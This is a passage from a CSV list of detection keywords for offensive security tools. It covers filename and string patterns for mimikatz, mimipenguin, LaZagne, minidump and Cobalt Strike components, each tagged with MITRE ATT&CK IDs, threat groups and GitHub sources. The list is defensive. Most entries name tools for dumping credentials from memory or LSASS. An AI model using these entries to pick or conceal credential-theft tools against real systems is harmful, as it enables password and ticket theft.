tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikatz.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mimikatz.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*mimikatz_cred_collector.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*mimikatz_dotnet2js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*mimikatz_dynwrapx*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*mimikatz_tashlib*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*mimikatz_trunk*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikatz_x64.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*mimikatz_x86.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*MimikatzByPowerShellForDomain.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*MimikatzOnLocal.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*mimikittenz*","offensive_tool_keyword","mimikittenz","mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff","T1003 - T1216 - T1552 - T1002 - T1083","TA0003 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/orlyjamie/mimikittenz","1","1","N/A","10","10","1793","352","2020-10-16T01:20:30Z","2016-07-04T13:57:18Z" +"*mimilib (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib for Windows (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mimilove*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilove.exe*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilove.vcxproj*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimipenguin*","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. This was assigned CVE-2018-20781 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781). Fun fact its still not fixed after GNOME Keyring 3.27.2 and still works as of 3.28.0.2-1ubuntu1.18.04.1.","T1555 - T1003 - T1212 - T1558","TA0001 - TA0003","N/A","N/A","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","N/A","N/A","10","3565","645","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z" +"*mimipenguin.*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*mimipenguin.cna*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*mimipenguin.git*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mimipenguin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*mimipenguin.so*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*mimipenguin_x32.so*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*mimiRatz*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*mimishim.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*mimispool.dll*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*minidump*minikerberos*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*minidump.* lsass.dmp*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" +"*Minidump.exe*","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" +"*minidump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*Minidump.sln*","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" +"*minidump_add_memory_block*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*minidump_add_memory64_block*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*minidumpwritedump*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*MiniDumpWriteDump*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 